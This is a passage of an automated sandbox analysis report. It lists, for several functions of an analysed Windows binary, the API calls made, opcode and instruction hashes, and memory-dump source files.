                                                                        • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                        • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                        APIs
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                        • String ID: X
                                                                        • API String ID: 780548581-3081909835
                                                                        • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                        • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                        • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                        • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                        APIs
                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                        • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                        • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                        • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                        • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                        • CloseFigure.GDI32(?), ref: 0044751F
                                                                        • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                        • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                        • String ID:
                                                                        • API String ID: 4082120231-0
                                                                        • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                        • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                        • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                        • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                        • String ID:
                                                                        • API String ID: 2027346449-0
                                                                        • Opcode ID: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                                        • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                        • Opcode Fuzzy Hash: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                                        • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                        • GetMenu.USER32 ref: 0047A703
                                                                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                        • _wcslen.LIBCMT ref: 0047A79E
                                                                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3257027151-0
                                                                        • Opcode ID: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                                        • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                        • Opcode Fuzzy Hash: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                                        • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                        APIs
                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastselect
                                                                        • String ID:
                                                                        • API String ID: 215497628-0
                                                                        • Opcode ID: 7869ea255bd8c826c1db511583610b45135028457a69a3d51942e2ff55a69274
                                                                        • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                        • Opcode Fuzzy Hash: 7869ea255bd8c826c1db511583610b45135028457a69a3d51942e2ff55a69274
                                                                        • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 0044443B
                                                                        • GetKeyboardState.USER32(?), ref: 00444450
                                                                        • SetKeyboardState.USER32(?), ref: 004444A4
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                        • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                        • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                        • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 00444633
                                                                        • GetKeyboardState.USER32(?), ref: 00444648
                                                                        • SetKeyboardState.USER32(?), ref: 0044469C
                                                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                        • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                        • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                        • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                        • String ID:
                                                                        • API String ID: 2354583917-0
                                                                        • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                        • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                        • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                        • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                        • String ID: #v
                                                                        • API String ID: 2449869053-554117064
                                                                        • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                        • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                        • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                        • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                        • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                        • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                        • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                        APIs
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Enable$Show$MessageMoveSend
                                                                        • String ID:
                                                                        • API String ID: 896007046-0
                                                                        • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                        • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                        • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                        • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                        • GetFocus.USER32 ref: 00448ACF
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Enable$Show$FocusMessageSend
                                                                        • String ID:
                                                                        • API String ID: 3429747543-0
                                                                        • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                        • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                        • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                        • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                        • __swprintf.LIBCMT ref: 0045D4E9
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                        • String ID: %lu$\VH
                                                                        • API String ID: 3164766367-2432546070
                                                                        • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                        • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                        • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                        • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
